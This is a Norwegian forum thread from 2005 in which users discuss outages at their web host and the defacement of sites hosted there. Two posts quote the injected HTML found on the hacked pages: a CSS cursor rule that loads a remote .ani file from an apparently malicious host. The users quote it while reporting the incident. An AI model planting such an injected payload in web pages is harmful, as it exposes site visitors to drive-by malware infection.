Haraldson Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Det er synd, så absolutt Lenke til kommentar
potetskrell Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Jeg må si det igjen - det spiser meg opp innvendig at hw.no ikke tok i bruk designforslaget PoleCat kom med for en stund tilbake. Det var rett og slett perfekt! Det kunne ikke blitt gjort bedre, det var oversiktlig, dekorativt, og klarte til og med å få med de stygge reklamene på en pen måte. Det er nesten til å grine av. «Den vise lærer av andres feil. Den kloke lærer av egne feil. Den dumme lærer aldri.» 5019624[/snapback] Har du en lenke til det? Glemt av hvordan det ser ut. Lenke til kommentar
Haraldson Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Blah... Ser ut til at STW har tatt ned sida mi, eller i alle fall sperra tilgangen via HTTP. Lenke til kommentar
Jesper Karsrud Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Du er ikke den eneste.. Begynner å gå mektig lei av STW nå, vurderer å bytte host... Lenke til kommentar
Haraldson Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Enig... Tror jeg kommer til å gjøre det - en gang jeg gidder Ja, se der ja, jeg var ikke den eneste likevel. Trodde jeg sjekka andre som brukte STW, og sendte dermed en utfyllende mail om betalinga som ble litt kronglete og greier... Lenke til kommentar
Lovskogen Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Hmm, mitt er oppe. Står ikke noe her: http://servetheworld.no/status/ Lenke til kommentar
jorgis Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 (endret) Blir mer og mer irritert på STW nå. Først klarer de å gi meg en heftig dose nedetid, og nå er www.vikingboard.com defacet og fyllt opp med virus. EDIT: Greeaaat... Ser nå på serverstatus-siden til STW at på fredag var det et "Kritisk driftsproblem serve028, maskin må reinstalleres forvent at det er OK i løpet av noen timer." og nå er det det snart tirsdag, og ting er fremdeles røtent. At min side (som er på serve20, og ikke skulle vært berørt av noen feil) har vært temmelig mye nede skjønner jeg ikke helt. Endret 17. oktober 2005 av jorgis Lenke til kommentar
PT Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 og nå er www.vikingboard.com defacet og fyllt opp med virus. 5020854[/snapback] Så det var noe gale ja.. Peiling på hvordan tingene står? Lenke til kommentar
Dahl Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 (endret) og nå er www.vikingboard.com defacet og fyllt opp med virus. 5020854[/snapback] Jeg hadde håpet på at når det først var virus, så skulle det være noe spennende/morsomme greier, men det var det ikke akkurat. <html> <head> <style> * {CURSOR: url("http://underground.ae21vek.ru/ani/indax.ani")} </style> </head> </html> Endret 17. oktober 2005 av @kd Lenke til kommentar
Lovskogen Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Jeg lukter hatmail! Lenke til kommentar
Dahl Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Eller enda enklere, hva med å bytte host? Lenke til kommentar
Jesper Karsrud Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Det tar tid... Noe i hvertfall ikke jeg har så mye av for tiden... Hvis problemet fortsetter skal i hvertfall jeg sende en ganske så lang mail og si at jeg bytter host hvis de ikke skjerper seg snart, for nå holder de ikke det jeg betaler for at de skal holde! Argh! blir så irritert! Lenke til kommentar
Marvil Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 og nå er www.vikingboard.com defacet og fyllt opp med virus. 5020854[/snapback] Jeg hadde håpet på at når det først var virus, så skulle det være noe spennende/morsomme greier, men det var det ikke akkurat. <html> <head> <style> * {CURSOR: url("http://underground.ae21vek.ru/ani/indax.ani")} </style> </head> </html> 5020946[/snapback] Øyh! Jeg har samma pisset i galleriet mitt. Bare å legge inn alt på nytt, eller får de kjørt noe backupgreier..? Lenke til kommentar
Marvil Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Jeg har visst samma greiene mange steder på webhotellet mitt.. Go STW! Lenke til kommentar
mikk- Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 KlubbLAN, som ligger på STW, ser ikke ut til å ha noen problemer. Kanskje dere har uflaks? Lenke til kommentar
Haraldson Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 (endret) Er visst det jeg og har... *Håpe at det finnes backup* Edit: Det hjelper ikke å laste opp en ny versjon heller... Endret 17. oktober 2005 av Mr.Berg Lenke til kommentar
Roberto Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Screw STW! Sats heller på (mt), tihi. Lenke til kommentar
Haraldson Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 Pfft, klart - er du blå har du råd til det Neida, men finnes andre alternativer jeg ville ha vurdert før (mt)... Lenke til kommentar
Roberto Skrevet 17. oktober 2005 Del Skrevet 17. oktober 2005 8 dollar er ikke mye i mnd for 2Gb lagringsplass, 30Gb transfer og 5 domener! Nå som jeg tenker over det kunne jo én av dere registrere ett "toppdomene" som f.eks. vikingboard.com, og så kan 5 stk ligge på samme hosting-plan med sine egne domener...? Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå